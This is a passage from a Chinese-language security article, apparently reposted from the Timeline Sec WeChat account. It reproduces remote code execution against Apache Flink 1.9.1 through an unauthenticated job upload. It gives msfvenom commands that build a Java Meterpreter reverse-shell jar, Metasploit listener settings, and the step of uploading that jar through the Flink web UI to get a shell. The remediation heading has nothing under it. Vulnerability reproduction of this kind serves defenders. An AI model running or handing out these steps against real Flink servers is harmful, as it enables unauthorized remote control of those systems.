0x03 环境搭建
测试环境:Flink 1.9.1 java8+
Apache Flink 1.9.1安装包下载
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
解压后进入bin文件夹,运行./start-cluster.sh
验证Flink启动之后,默认web 端口8081是否正常
访问http://ip:8081/可看到环境页面
生成rce.jar文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8087 -f jar > rce.jar
2、配置msf监听
use exploit/multi/handlerset payload java/shell/reverse_tcpset LHOST 127.0.0.1set LPORT 8087show optionsrun
在Submit New Job处上传rec.jar文件,点击submit
成功反弹shell,执行id可看到结果
0x05 修复方式
本文分享自 Timeline Sec 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!